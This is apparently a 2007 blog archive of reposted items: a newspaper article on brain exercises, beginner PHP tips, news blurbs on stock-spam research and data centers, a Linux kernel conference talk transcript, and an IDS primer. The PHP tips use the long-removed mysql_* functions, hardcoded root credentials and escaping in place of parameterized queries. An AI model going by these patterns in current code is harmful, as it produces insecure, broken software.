Tuesday, January 23, 2007

8 ways to exercise your brain

By DAWN SAGARIO
REGISTER STAFF WRITER
January 22, 2007









MARK MARTURELLO/REGISTER ILLUSTRATION


There are some aspects of aging, such as gray hair, that Laura Bestler-Wilcox can accept.

Mental decline is not one of them.

"I'm only 38, but I have no intention of growing old - mentally, at least," said Bestler-Wilcox, from Ames.

She started playing Nintendo's Brain Age game last month, and says it helps keep her brain active. The goal is to score the ideal "brain age" of 20, which you achieve by doing a range of exercises - from math problems and counting the number of syllables in words, to reading aloud and Sudoku.

"I do math better," said Bestler-Wilcox, who plays the game every other day for about 20 minutes. "It's like doing exercises for different parts of your body. This is exercising your brain."

Staying mentally fit is a hot topic - from new research touting the benefits of mental exercises, to seminars on maintaining your brain health done by AARP and the Alzheimer's Association.

Two new studies, one done in Des Moines, show that brain workouts are beneficial for mental health, and can help improve brain function.

Brain health is an important issue among America's approximately 78 million baby boomers. The AARP Web site includes tips for a healthy brain, as well as brain puzzles. The organization conducted about 30 presentations nationwide on brain health last year, said Michael Patterson, manager of AARP's "Staying Sharp" program.

"People seem to be more willing to put up with physical decline, more than mental decline," Patterson said.

Here are eight ways people of all ages can keep mentally sharp.

1. PLAY HEAD GAMES

Brain games may help improve mental function, and could possibly help prevent dementia.

That's according to a six-month pilot study in Des Moines that included Alzheimer's patients.

Participants used the "Happy Neuron" software (www.happyneuron.com), said geriatrician Dr. Robert Bender, who led the research team. The activities targeted language, visual-spatial and memorization skills.

The findings were released earlier this month.

The games seem to help overall brain health, said Bender, medical director of the Orr Center for Memory and Healthy Aging in West Des Moines. Researchers don't know yet whether doing the exercises can definitely prevent diseases like Alzheimer's.

"The challenge is to stretch yourself, at the same time without making it frustrating," Bender said. "At all ages, we need to challenge our brain to learn new things, and that's the main thing."

The study's "brain wellness program" also included: consistent social interaction, physical exercise, a low-fat diet, stress management and meditation.

Caregivers also participated in the study, funded by the Centers for Disease Control and Prevention.

2. TRAIN YOUR BRAIN

Brain training can help ease daily tasks. Seniors who did certain mental exercises improved their thinking skills, according to a recent study.

They also had an easier time performing everyday tasks, even five years after receiving training, compared to untrained people.

The difference was significant for people who had reasoning training, said Michael Marsiske, one of the principal investigators of the study.

The study included 2,802 adults age 65 and older who were living independently and had normal brain function.

The training exercises included:

- Memory: To help people memorize word lists, one method was to organize a grocery list by the sections of the store, said Marsiske, an associate professor in the department of clinical health and psychology at the University of Florida.

- Visualization: Use all your senses to remember things. For example, if you need to remember a dog's name, visualize what the dog's fur feels like, recall the sound of its bark, and, yes, try to re-create its smell.

- Reasoning: Participants learned to use highlighters to identify key points in complicated information. That included underlining important information like dosage and frequency on a medication.

3. TAXES

Don Eller of Urbandale says he stays sharp by volunteering to do people's taxes as part of a program run by AARP.

"In preparation to do that, there are tax classes you attend," said Eller, 76. "So you are continuing working with numbers and math concepts."

During the off-season, he likes to play Sudoku online. He also tries to take daily walks, and on most days walks about three miles.

Marsiske recommends taxpayers take a crack at those pesky forms and complicated columns of numbers before handing them off to professionals. It's just one way to flex your mental brawn.

"That's where you're engaging your mental activity," Marsiske said.

Another simple numbers tip: Figure out the calculations yourself, first, before breaking out the calculator.

4. BUILD YOUR "COGNITIVE RESERVE"

There's a whole new body of research showing that individuals who have a lot of education, hold highly challenging jobs and stay socially engaged have the highest levels of mental function and the lowest levels of decline later in life, Marsiske said.

"If we do things to produce healthy brains early in life, then we will benefit from that later in life," he said.

5. REMEMBER PASSWORDS

Keep track of your passwords - without the help of your computer. This is Marsiske's trick: "I never let my computer remember any passwords," he said. He writes them down in a hidden spot, in a hidden code. "What I want to do is engage in that act of having to remember."

6. RETHINK YOUR CROSSWORD PUZZLE

Remember that you want to find activities that test your mental mettle. One danger with crossword puzzles, Bender said, is that people who regularly do them may already be familiar with the vocabulary. Avoid slipping into the familiar, and try something new.

7. APRENDER EL ESPAÑOL

Translation: Learn Spanish, or another new language or mechanical skill. "It's important to find things that we enjoy because that lowers stress and that helps the brain work better," Bender said.

8. EXERCISE YOUR BODY

What's good for the body is good for the brain. More research is confirming that exercise, diet, a healthy lifestyle and getting an adequate amount of sleep not only keep you physically healthy, but also mentally, Marsiske said.

Reporter Dawn Sagario can be reached at (515) 284-8351 or dsagario@dmreg.com

Monday, January 22, 2007

10 Tips That Every PHP Newbie Should Know

I wish I had known these 10 tips the day I started working with PHP. Instead of learning them through painstaking process, I could have been on my way to becoming a PHP programmer even sooner! This article is presented in two parts and is intended for folks who are new to PHP.
Tip 1: MySQL Connection Class
The majority of web applications I've worked with over the past year have used some variation of this connection class:

class DB {
    var $host;
    var $db;
    var $user;
    var $pass;
    var $link;

    function DB() {
        $this->host = "localhost"; // your host
        $this->db   = "myDatabase"; // your database
        $this->user = "root"; // your username
        $this->pass = "mysql"; // your password

        $this->link = mysql_connect($this->host, $this->user, $this->pass);
        mysql_select_db($this->db, $this->link);
    }
}

// calls it to action
$db = new DB;

Simply edit the variables and include this in your files. It doesn't require any special understanding to use, and once you've added it to your repertoire, you won't likely need to write a new connection class any time soon. Now you can get to work and quickly connect to your database without a lot of extra code:

$result = mysql_query("SELECT * FROM table ORDER BY id ASC LIMIT 0,10");

More information can be found in the manual--be sure you read the comments: http://www.php.net/mysql_connect/
Tip 2: Dealing with Magic Quotes
PHP can "automagically" apply slashes to your $_POST data for security purposes; it's an important measure to help prevent SQL injection. However, those slashes can wreak havoc in your scripts. The way to handle them is to strip them from your variables. But what if the magic quotes directive is not enabled? Here's an easy method for dealing with both cases:

function magicQuotes($post) {

    if (get_magic_quotes_gpc()) {
        if (is_array($post)) {
            return array_map('stripslashes', $post);
        } else {
            return stripslashes($post);
        }
    } else {
        return $post; // magic quotes are not ON so we leave the data untouched
    }

}

The script above checks whether magic quotes is enabled. If it is, it determines whether your $_POST data is an array (which it likely is) and then strips the slashes accordingly.
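To see what the stripping step actually does to the data, here's a minimal, self-contained sketch of the core of that helper (the sample values are invented for illustration; they mimic what PHP delivers when magic quotes is ON):

```php
<?php
// Hypothetical form input as PHP would deliver it with magic quotes ON:
// every quote arrives escaped with a backslash.
$post = array(
    'name'    => "O\\'Reilly",
    'comment' => "She said \\\"hi\\\"",
);

// This is the heart of the magicQuotes() helper above:
// array_map() runs stripslashes() over every element of the array.
$clean = array_map('stripslashes', $post);

echo $clean['name'];    // O'Reilly
echo "\n";
echo $clean['comment']; // She said "hi"
```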
Understand that this is not true 'validation'. Be sure to validate all your user-submitted data with regular expressions (which is the most common way to do so).
More information about magic quotes: http://www.php.net/magic_quotes/
More information about SQL injection: http://www.php.net/manual/en/security.database.sql-injection.php
More information about regular expressions: http://www.php.net/pcre/
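As a quick sketch of that kind of regex validation (the function name and pattern here are our own, invented for illustration): a whitelist pattern declares what a field may contain, instead of trying to strip out everything it may not.

```php
<?php
// Hypothetical validator: accept 3-20 characters consisting only of
// letters, digits and underscores. preg_match() returns 1 on a match.
function isValidUsername($value) {
    return preg_match('/^[A-Za-z0-9_]{3,20}$/', $value) === 1;
}

var_dump(isValidUsername('dawn_s'));           // bool(true)
var_dump(isValidUsername("x'; DROP TABLE--")); // bool(false)
```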
Tip 3: Safely Query Database with mysql_real_escape_string
When you are ready to query your database you will need to escape special characters (quotes for instance) for safety's sake by adding slashes. We apply these before we insert variables into our database. Once again, we need to determine which version of PHP you are running first:

function escapeString($post) {

    // version_compare() is safer than comparing version strings directly
    if (version_compare(phpversion(), '4.3.0', '>=')) {
        return array_map('mysql_real_escape_string', $post);
    } else {
        return array_map('mysql_escape_string', $post);
    }

}

More information about mysql_real_escape_string: http://www.php.net/mysql_real_escape_string/
More information about SQL injection: http://php.belnet.be/manual/en/security.database.sql-injection.php
Tip 4: Debugging
If you search the forum there are many good threads with rules about debugging. The single most important thing you can do is ask PHP to report errors and notices to you by adding this line at the beginning of your scripts:

error_reporting(E_ALL);

This will keep you in line as you learn by printing out errors to your screen. The most common error that E_ALL reports is not actually an error, but a notice for an "Undefined index". Typically, it means that you have not properly set your variable. It's easy to fix and keeps you programming correctly.
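A minimal sketch of where that "Undefined index" notice comes from and how to avoid it (the array here is made up to stand in for $_POST):

```php
<?php
// Simulated form data: the 'email' field was never submitted.
$post = array('name' => 'Don');

// echo $post['email'];  // this line would raise an "Undefined index" notice

// Check before you read, and supply a default value:
$email = isset($post['email']) ? $post['email'] : '';
echo $email === '' ? "no email submitted" : $email; // no email submitted
```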
Another convenient tool while working with queries is print_r(). If your query is returning null or strange results, simply place this after your query command and it will display all the contents of the $result array.

print_r($result); exit;

The exit command stops your script from executing any further so you can specifically review your query results.
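Here's a self-contained sketch of what print_r() shows you. The $result array is invented to stand in for real query output, and the second argument makes print_r() return the text instead of printing it (handy if you want to log it); the article's plain print_r($result); exit; form prints the same structure directly.

```php
<?php
// Made-up rows standing in for fetched query results.
$result = array(
    array('id' => 1, 'name' => 'Laura'),
    array('id' => 2, 'name' => 'Don'),
);

// Pass true as the second argument to get the dump back as a string.
$dump = print_r($result, true);
echo $dump;
// Output looks like:
// Array
// (
//     [0] => Array
//         (
//             [id] => 1
//             [name] => Laura
//         )
//     ...
// )
```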
More information about error_reporting: http://www.php.net/error_reporting/
More information about print_r: http://www.php.net/print_r/
Tip 5: Writing Functions (and Classes)
Initially I thought that tackling functions and classes would be difficult--thankfully I was wrong. Writing a function is something I urge all newbies to start doing immediately--it's really that simple. You are instantly involved in understanding how to produce more efficient code in smaller pieces. Where you might have a line of code that reads like this:

if ($rs['prefix'] == 1) {
$prfx = 'Mrs. ';
} elseif ($rs['prefix'] == 2) {
$prfx = 'Ms. ';
} else {
$prfx = 'Mr. ';
}

echo $prfx.$rs['name'].' '.$rs['last_name'];

You could rewrite it like this in a function:

function makePrefix($prefix = '')
{
    if ($prefix == 1) return 'Mrs. ';
    if ($prefix == 2) return 'Ms. ';
    if ($prefix == 3) return 'Mr. ';
    return ''; // unknown or empty prefix
}

echo makePrefix($rs['prefix']) . $rs['name'] . ' ' . $rs['last_name'];

Now that you've written this function, you can use it in many different projects!
An easy way to describe a class is to think of it as a collection of functions that work together. Writing a good class requires an understanding of PHP 5's new OOP structure, but by writing functions you are well on your way to some of the greater powers of PHP.
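As a minimal sketch of that idea, here's the makePrefix() logic from above wrapped in a small class; the class name Formatter and the fullName() method are invented for illustration:

```php
<?php
// A class as "a collection of functions that work together":
// one method builds the prefix, another uses it to build a full name.
class Formatter {
    function makePrefix($prefix = '') {
        if ($prefix == 1) return 'Mrs. ';
        if ($prefix == 2) return 'Ms. ';
        if ($prefix == 3) return 'Mr. ';
        return ''; // unknown or empty prefix
    }

    function fullName($row) {
        return $this->makePrefix($row['prefix'])
             . $row['name'] . ' ' . $row['last_name'];
    }
}

$fmt = new Formatter();
echo $fmt->fullName(array('prefix' => 2, 'name' => 'Dawn', 'last_name' => 'Sagario'));
// Ms. Dawn Sagario
```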
More information about writing functions: http://www.php.net/manual/en/language.functions.php
More information about writing classes: http://www.php.net/manual/en/language.oop5.php
Everything I've learned, more or less, came from the manual, trial and error and great help from the many fine people here at PHPBuilder. Good luck programming--and come back soon for Part 2 in this series!

The Anatomy of Pump N' Dump Stock Spamming

"Laura Frieder and Jonathan Zittrain have analyzed pump n' dump spam activity in their paper 'Spam Works: Evidence from Stock Touts and Corresponding Market Activity'. Unbelievably, it appears that spammers are able to achieve a 5% gain on pumped stock before dumping it, along with a dramatic increase in transaction volume of the stock. From the synopsis: ' We suggest that the effectiveness of spammed stock touting calls into question prevailing models of securities regulation that rely principally on the proper labeling of information and disclosure of conflicts of interest to protect consumers, and we propose several regulatory and industry interventions. Based on a large sample of touted stocks listed on the Pink Sheets quotation system, we find that stocks experience a significantly positive return on days prior to heavy touting via spam. Volume of trading responds positively and significantly to heavy touting.'"

Google, Microsoft Escalate Data Center Battle

"The race by Microsoft and Google to build next-generation data centers is intensifying. On Thursday Microsoft announced a $550 million San Antonio project, only to have Google confirm plans for a $600 million site in North Carolina. It appears Google may just be getting started, as it is apparently planning two more enormous data centers in South Carolina, which may cost another $950 million. These 'Death Star' data centers are emerging as key assets in the competitive struggle between Microsoft and Google, which have both scaled up their spending (as previously discussed on Slashdot). Some pundits, like PBS' Robert X. Cringely, say the scope and cost of these projects reflect the immense scale of Google's ambitions."

Myths, Lies, and Truths about the Linux kernel

slide 00
Hi, as Dave said, I'm Greg, and I've been given the time by the people at OLS to talk to you for a bit about kernel stuff. I'm going to discuss a number of different lies that people always say about the kernel and try to debunk them; go over a few truths that aren't commonly known; and discuss some myths that I hear repeated a lot.

Now when I say a myth, I'm referring to something that is believed to have some truth to it, but when you really examine it, it turns out to be fictional. Let's call them the "urban myths" of the Linux kernel.

So, to start, let's look at a very common myth that really annoys me a lot:

slide 01
Now I know that almost everyone involved in Linux has heard something like this in the past: about how Linux lacks device support, or really needs to support more hardware, or how we are lagging in the whole area of drivers. I saw almost this same kind of quote from someone at OSDL a few months back, in my local paper, and it's extremely annoying.

This is really a myth, so people should really know better these days about saying this. So, who said this specific quote?:

slide 02
Ick.

Ok, well, he probably said this a long time ago, back when Linux really didn't support many different things, and when "Plug & Play" was a big deal with ISA buses and stuff:

slide 03
Ugh.

Ok, so maybe I need to spend some time and really debunk this myth as it really isn't true anymore.

So, what is the truth concerning Linux and devices these days? It's this:

slide 04
Yes, that's right, we support more things than anyone else. And more than anyone else ever has in the past. Linux has a very long list of things that we have supported before anyone else ever did. That includes such things as:

  • USB 2.0

  • Bluetooth

  • PCI Hotplug

  • CPU Hotplug

  • memory Hotplug (ok, some of the older Unixes did support CPU and memory hotplug in the past, but no desktop OS still supports this.)

  • wireless USB

  • ExpressCard


and the list can go on, the embedded arena is especially full of drivers that no one else supports.

But there's a real big part of the whole hardware support issue that goes beyond just specific drivers, and that's this:

slide 05
Yes, we passed the NetBSD people a few years ago in the number of different processor families and types that we support now. No other "major" operating system even comes remotely close in platform support for what we have in Linux. Linux now runs in everything from a cellphone, to a radio controlled helicopter, your desktop, a server on the internet, on up to a huge 73% of the TOP500 largest supercomputers in the world.

And remember, almost every driver that we support runs on every one of those different platforms. This is something that no one else has ever done in the history of computing. It's just amazing how flexible and how powerful Linux is this way.

We now have the most scalable and most supported operating system that has ever been created. We have achieved something so unique, different and flexible that everyone needs to stop repeating the "Linux doesn't support hardware" myth, as it simply isn't true anymore.

Now, to be fair to Jeff Jaffe, when he said that original quote, he had just become the CTO of Novell, and didn't really have much recent experience with Linux, and did not realize the real state of device support that the modern distros now provide.

Look at the latest versions of Fedora, SuSE, Ubuntu and others. Installation is a complete breeze (way easier than any other operating system installation). You can now plug a new device in and the correct driver is automatically loaded, no need to hunt for a driver disk somewhere, and you are up and running with no need to even reboot.

As an example of this, I recently plugged a new USB printer into my laptop, and a dialog box popped up and asked me if I wanted to print a test page on it. That's it, nothing else. If that isn't "plug and play", I really don't know what is.

But not everyone has been ignoring the success of Linux, as is obvious by the size of this conference. Lots of people see Linux and want to use it for their needs, but when they start looking deeper into the kernel and how it is developed, almost the first thing they run into is the total lack of a plan:

slide 06
This drives lots of people absolutely crazy all the time. You see questions like "Linux has no roadmap so how can I create a product with it", and "How does anyone get anything done since no one is directing anyone", and other things like this.

Well, obviously based on the fact that we are successful at doing something that's never been done before, we must have got here somehow, and be doing something right, but what is it?

Traditionally software is created by determining the requirements for it, writing up a big specification document, reviewing it and getting everyone to agree on it, implement the spec, test it, and so on. In college they teach software engineering methodology like the waterfall method, the iterative process method, formal proof methods, and others. Then there's the new ways of creating programs like extreme programming and top-down design, and so on.

So, what do we do here in the kernel?

slide 07
Dr. Baba studies how businesses work and came to this conclusion after researching how the open source community works and specifically how the Linux kernel is developed and managed.

I guess it makes sense that since we have now created something that has never been done before, we did it by doing something different than anyone else. So, what is it? How is the kernel designed and created? Linus answered this question last year when he said the following to a group of companies when he was asked to explain the kernel design process:

slide 08
This is a really important point that a lot of people don't seem to understand. Actually, I think they understand it, they just really don't like it.

The kernel is not developed with big design documents, feature requests and so on. It evolves over time based on the need at the moment for it. When it first started out, it only supported one type of processor, as that's all it needed to. Later, a second architecture was added, and then more and more as time went on. And each time we added a new architecture, the developers figured out only what was needed to support that specific architecture, and did the work for that. They didn't do the work in the very beginning to allow for the incredible flexibility of different processor types that we have now, as they didn't know what was going to be needed.

The kernel only changes when it needs to, in ways that it needs to change. It has been scaled down to tiny little processors when that need came about, and was scaled way up when other people wanted to do that. And every time that happened, the code was merged back into the tree to let everyone else benefit from the changes, as that's the license that the kernel is released under.

Jonathan on the first day of the conference showed you the huge rate of change that the kernel is under. Tons of new features are added at a gigantic rate, along with bug fixes and other things like cleanups. This shows how fast the kernel is still evolving, almost 15 years after it was created. It's morphed into this thing that is very adaptable and looks almost nothing like what it was even a few years ago. And that's the big reason why Linux is so successful, and why it will keep being successful. It's because we embrace change, and love it, and welcome it.

But one "problem" for a lot of people is that due to this constantly evolving state, the Linux kernel doesn't provide some things that "traditional" operating systems do. Things like an in-kernel stable API. Everyone has heard this one before:

slide 09
For those of you who don't know what an API is, it is the description of how the kernel talks within itself to get things done. It describes things like what the specific functions are that are needed to do a specific task, and how those functions are called.

For Linux, we don't have a stable internal api, and for people to wish that we would have one is just foolish. Almost two years ago, the kernel developers sat down and wrote why Linux doesn't have an in-kernel stable API and published it within the kernel in the file:

slide 10
If you have any questions please go read this file. It explains why Linux doesn't have a stable in-kernel api, and why it never will. It all goes back to the evolution thing. If we were to freeze how the kernel works internally, we would not be able to evolve in ways that we need to do so.

Here's an example that shows how this all works. The Linux USB code has been rewritten at least three times. We've done this over time in order to handle things that we didn't originally need to handle, like high speed devices, and just because we learned the problems of our first design, and to fix bugs and security issues. Each time we made changes in our api, we updated all of the kernel drivers that used the apis, so nothing would break. And we deleted the old functions as they were no longer needed, and did things wrong. Because of this, Linux now has the fastest USB bus speeds when you test out all of the different operating systems. We max out the hardware as fast as it can go, and you can do this from simple userspace programs, no fancy kernel driver work is needed.

Now Windows has also rewritten their USB stack at least 3 times, with Vista, it might be 4 times, I haven't taken a look at it yet. But each time they did a rework, and added new functions and fixed up older ones, they had to keep the old api functions around, as they have taken the stance that they can not break backward compatibility due to their stable API viewpoint. They also don't have access to the code in all of the different drivers, so they can't fix them up. So now the Windows core has all 3 sets of API functions in it, as they can't delete things. That means they maintain the old functions, and have to keep them in memory all the time, and it takes up engineering time to handle all of this extra complexity. That's their business decision to do this, and that's fine, but with Linux, we didn't make that decision, and it helps us remain a lot smaller, more stable, and more secure.

And by secure, I really mean it. A lot of times a security problem will be found in one driver, or in one core part of the kernel, and the kernel developers fix it, and then go and fix it up in all other drivers that have the same problem. Then, when the fix is released, all users of all drivers are now secure. When other operating systems don't have all of the drivers in their tree, if they fix a security problem, it's up to the individual companies to update their drivers and fix the problem too. And that rarely happens. So people buy the device and then use the older driver that comes in the box with it, which is insecure. This has happened a lot recently, and really shows how having a stable api can actually hurt end users, when the original goal was to help developers.

What usually happens after I talk to people about the instability of the kernel api and how kernel development works is that they respond with:

slide 11
This just is not true at all. We have a whole sub-architecture that only has 2 users in the world. We have drivers that I know have only one user, as there was only one piece of hardware ever made for them. It just isn't true; we will take drivers for anything into our tree, as we really want them.

We want more drivers, no matter how "obscure", because it allows us to see patterns in the code, and realize how we could do things better. If we see a few drivers doing the same thing, we usually take that common code and move it into a shared piece of code, making the individual drivers smaller, and usually fixing things up nicer. We also have merged entire drivers together because they do almost the same thing. An example of this is a USB data acquisition driver that we have in the kernel. There are loads of different USB data acquisition devices out in the world, and one German company sent me a driver a while ago to support their devices. It turns out that I was working on a separate driver for a different company that did much the same thing. So, we worked together and merged the two, and we now have a smaller kernel. That one driver turned out to work for a few other companies' devices too, so they simply had to add their device id to the driver and never had to write any new code to get full Linux support. The original German company is happy as their devices are fully supported, which is what their customers wanted, and all of the other companies are very happy, as they really didn't have to do any extra work at all. Everyone wins.

The second thing that people ask me about when it comes to getting code into the kernel is, well, we want to keep our code private, because it is proprietary.

So, here's the simple answer to this issue:

slide 12
That's it, it is very simple. I've had the misfortune of talking to a lot of different IP lawyers over the years about this topic, and every one that I've talked to agrees that there is no way that anyone can create a Linux kernel module, today, that can be closed source. It just violates the GPL due to fun things like derivative works and linking and other stuff. Again, it's very simple.

Now no lawyer will ever come out in public and say this, as lawyers really aren't allowed to make public statements like this at all. But if you hire one and talk to them in the client/lawyer setting, they will advise you on this issue.

I'm not a lawyer, nor do I want to be one, so don't ask me anything else about this, please. If you have legal questions about license issues, talk to a lawyer, never bring it up on a public mailing list like linux-kernel, which only has programmers. To ask programmers to give legal rulings, in public, is the same as asking us for medical advice. It doesn't make sense at all.

But what would happen if one day the Linux kernel developers suddenly decided to let closed source modules into the kernel? How would that affect how the kernel works and evolves over time?

It turns out that Arjan van de Ven has written up a great thought exercise detailing exactly what would happen if this came true:

slide 13
In his article, which can be found in the linux-kernel archives really easily, he described how only the big distros, Novell and Red Hat, would be able to support any new hardware that came out, but would slowly stagnate as they would not be allowed to change anything that might break the different closed source drivers. And then, if you loaded more than one closed source module, support for your system would pretty much be impossible. Even today, this is easily seen if you try to load more than one closed source module into your system, if anything goes wrong, no company will be willing to support your problem.

The article goes on to show how the community based distros, like Gentoo and Debian, would slowly become obsolete and not work on any new hardware platforms, and dry up as no users would be able to use them anymore. And eventually, in just a few short years, the whole kernel project itself would come to a standstill, unable to innovate or change anything.

It's a really chilling tale, and quite good, please go look it up if you are interested in this topic.

But there's one more aspect of the whole closed source module issue that I really want to bring up, and one that most people ignore. It's this:

slide 14
Remember, no one forces anyone to use Linux. If you don't want to create a Linux kernel module, you don't have to. But if your customers are demanding it, and you decide to do it, you have to play by the rules of the kernel. It's that simple.

And the rule of the kernel is the GPL, it's a simple license, with standard copyright ownership issues, and many lawyers understand it.

When a company says that they need to "protect their intellectual property", that's fine; neither I nor any other kernel developer has any objection to that. But by the same token, you need to respect the kernel developers' intellectual property rights. We released our code under the GPL, which states in very specific form exactly what your rights are when using this code. When you link other code into our body of code, you are obligated by the license of the kernel to also release your code under the same license (when you distribute it).

When you take the Linux kernel code, and link or build with the header files against it, with your code, and not abide by the well documented license of our code, you are saying that for some reason your code is much more important than the entire rest of the kernel. In short, you are giving every kernel developer who has ever released their code the finger.

So remember, the individual companies are not more important than the kernel, for without the kernel development community, the companies would have no kernel to use at all. Andrew Morton stood up here two years ago and called companies who create closed source modules leeches. I completely agree. What they do is just totally unethical. Some companies try to skirt the law in how they redistribute their closed source code, forcing the end user to do the building and linking, which then causes the user to violate the GPL if they want to give that prebuilt module to anyone else. These companies are just plain unethical and wrong.

Luckily people are really starting to realize this and the big distros are not accepting this anymore. Here's what Novell publicly stated earlier this year:

slide 15
This means that SuSE 10.1, and SLES and SLED 10 will not have any closed source kernel modules in it at all. This is a very good thing.

Red Hat also includes some text like this in its kernel package, but has not come out and made such a public statement.

Alright, enough depressing stuff. After companies realize that they really need to get their code into the kernel tree, they quickly run into one big problem:

slide 16
This really isn't as tough a problem as it first looks. Remember, the rate of change is about 6,000 different patches per kernel release, so someone is getting their code into the tree.

So, how to do it? Luckily, the kernel developers have written down everything you need to know about how to do kernel development. It's all in one file:

slide 17
Please point this file out to anyone who has questions on how to do kernel development. It answers just about every question anyone has ever asked, and points people to other places where the answers can be found.

It talks about how the kernel is developed, how to create a patch, how to find your way around the kernel tree, who to send patches to, what the different kernel trees are all about, and it even lists things you should never say on the linux-kernel mailing list if you expect people to take your code seriously.

It's a great file, and if you ever have anything that it doesn't help you out with, please let the author of that file know and they will work to add it. It should be the thing you give to any manager or developer who wants to learn more about how to get their code into the kernel tree.

One thing the HOWTO file describes is the various communities that can help people out with kernel development. If you are new to kernel development, there is the:

slide 18
project. It has a very good wiki, a very nice and tame mailing list where you can ask basic questions without feeling bad, and an IRC channel where you can ask questions in real time of a lot of different kernel developers. If you are just starting out, please go here; it's a very good place to learn.

If you really want to start out doing kernel development, but don't know what to do, the:

slide 19
project is an excellent place to start. It keeps a long list of different "janitorial" tasks that the kernel developers have said would be good to have done to the code base. You can pick from them and learn the basics of how to create a patch and how to fix your email client to send a proper patch, and then you get to see your name in the kernel changelog when your patches go in.

I really recommend this project for anyone who wants to start kernel development, but hasn't found anything specific to work on yet. It gets you to search around the kernel tree, fixing up odd things, and by doing that, you will usually find something that interests you that no one else is doing, and you can slowly start to take that portion of the kernel over. I can't recommend this group enough.
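
For readers who have never made a patch: kernel patches are plain unified diffs. The file name and code below are invented for illustration, but Python's standard difflib can sketch what that format looks like:

```python
import difflib

# Hypothetical "before" and "after" versions of a tiny source file,
# just to illustrate the unified diff format used for kernel patches.
old = ["int init(void)\n", "{\n", "        return 0\n", "}\n"]
new = ["int init(void)\n", "{\n", "        return 0;\n", "}\n"]

# fromfile/tofile become the "--- a/..." and "+++ b/..." header lines.
patch = difflib.unified_diff(old, new,
                             fromfile="a/drivers/foo.c",
                             tofile="b/drivers/foo.c")
print("".join(patch))
```

In practice you would generate the same thing with diff -up against a kernel tree; the ---/+++ header and the -/+ changed lines are the shape reviewers expect.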

And then, there's the big huge mailing list, where everyone lives on:

slide 20
This list gets about 200 emails a day and can be hugely daunting to anyone trying to read it. Here's a hint: almost no one, except Andrew Morton, reads all of the emails on it. The rest of us just use filters and read the things that interest us. I really suggest finding some developers that you know provide interesting commentary and reading the threads they respond to. Or just search for subjects that look interesting. But don't try to read everything; you'll never get any other work done if you do.
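
Filtering is usually done in the mail client, but the idea is simple enough to sketch in a few lines of Python (the developer names and keywords here are just placeholder examples):

```python
from email.message import EmailMessage

def interesting(msg, authors=("Andrew Morton",), keywords=("usb", "suspend")):
    """Keep a message if it is from a developer we follow, or if its
    subject mentions a topic we care about; drop everything else."""
    sender = msg.get("From", "")
    subject = msg.get("Subject", "").lower()
    return (any(a in sender for a in authors)
            or any(k in subject for k in keywords))

msg = EmailMessage()
msg["From"] = "Andrew Morton <akpm@example.org>"
msg["Subject"] = "[PATCH] mm: fix page allocator corner case"
print(interesting(msg))  # True: it's from a developer we follow
```

A real setup would express the same rules in procmail or your mail client's filter dialog; the point is only that a couple of sender/subject rules cut the list down to a readable size.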

The Linux kernel mailing list also has another, perceived, problem. Lots of people find the reactions of developers on this list very "harsh" at times. They post their code and get back scathing reviews of everything they did wrong. Usually the reviewers only criticize the code itself, but for most people this can be a very hard thing to be on the receiving end of. They just put out what they felt was a perfect thing, only to see it cut into a zillion tiny pieces.

The big problem here is that we really have only a very small group of people reviewing code in the kernel community. Reviewing code is a hard, unrewarding, tough thing to do. It makes you grumpy and rude in a very short period of time. I tried it out for a whole week, and at the end of it, I was writing emails like this one:

slide 21
Other people who review code aren't even as nice as I was here.

I'd like to publicly thank Christoph Hellwig and Randy Dunlap. Both of them spend a lot of time reviewing code on the linux-kernel mailing list, and Christoph especially has a very bad reputation for it. Bad in that people don't like his reviews. But the other kernel developers really do, because he is right. If he tells you something is wrong and you need to fix it, do it. Don't ignore the advice, because everyone else is watching to see if you really do fix up your code as asked. We need more Christophs in the kernel community.

If everyone could take a few hours a week and review the different patches sent to the mailing list, it would be a great thing. Even if you don't feel like you are a very good developer, read other people's code and ask questions about it. If they can't defend their design and code, then there's something really wrong.

It's also a great way to learn more about programming and the kernel. When you are learning to play an instrument, you don't start out writing full symphonies on your own; you spend years reading other people's scores and learning how things are put together, how they work and interact. Only later do you start writing your own music: small tunes, and then, if you want, working up to bigger pieces. The same goes for programming. You can learn a lot from reading and understanding other people's code. Study the things posted, ask why things are done in specific ways, and point out problems that you have noticed. It's a task the kernel really needs help with right now.

(possible side story about the quote)

Alright, but what if you want to help out with the kernel, but you aren't a programmer. What can you do? Last year Dave Jones told everyone that the kernel was going to pieces, with loads of bugs being found and no end in sight. A number of people made the response:

slide 22
Now, this is true; it would be great to have a simple set of tests that everyone could run for every release to ensure that nothing was broken and that everything's just right. But unfortunately, we don't have such a test suite just yet. The only set of real tests we have is for everyone to run the kernel on their machines and let us know if it works for them.

So that's what I suggest for people who want to help out yet are not programmers. Please run the nightly snapshots from Linus's kernel tree on your machine, and complain loudly if something breaks. If no one pays attention, complain again. Be really persistent. File bugs in:

slide 23
People do track things there. Sometimes it doesn't feel like it, but again, be persistent. If someone keeps complaining about something, we do feel bad and work to fix it. Don't feel bad about being a pest, because we need more pests to keep all of us kernel developers in line.

And if you really feel brave, please run Andrew Morton's -mm kernel tree. It contains all of the different kernel maintainers' development trees combined into one big mass of instability. It is the proving ground for what will eventually go into Linus's kernel tree, so we need people testing this kernel to report problems early, before the changes go into Linus's tree.

I wouldn't recommend running Andrew's kernels on a machine with data that you care about; that would not be wise. So if you have a spare machine, or a very good backup policy, please run his kernels and let us know if you have any problems.

So finally, in conclusion, here are the main things that I hope people remember:

slide 24
slide 25
slide 26
slide 27
slide 28
slide 29

What is IDS?

IDS is an acronym for Intrusion Detection System. An intrusion detection system detects intruders; that is, unexpected, unwanted or unauthorized people or programs on my computer network.

Why do I need IDS?

A network firewall will keep the bad guys off my network, right? And my anti-virus will recognize and get rid of any virus I might catch, right? And my password-protected access control will stop the office cleaner trawling through my network after I've gone home, right? So that's it - I'm fully protected, right?

Wrong!

A firewall has holes to let things through: without them, you wouldn't be able to access the Internet or send or receive email. Anti-virus systems are only good at detecting viruses they already know about. And passwords can be hacked, stolen, or left lying about on Post-its.

That's the problem. You can have all this security, and all you've really got is a false sense of security. If anything or anyone does get through these defenses, through the legitimate holes, it or they can live on your network, doing whatever they want for as long as they want. And then there's a whole raft of little-known vulnerabilities, known to criminals, who can exploit them and gain access for fun, profit or malevolence. A hacker will quietly change your system and leave a back door so that he can come and go undetected whenever he wants. A Trojan might be designed to hide itself, silently gather sensitive information and secretly mail it back to source. And you won't even know it's happening - worse, you'll believe it can't be happening because you've got a firewall, anti-virus and access control.

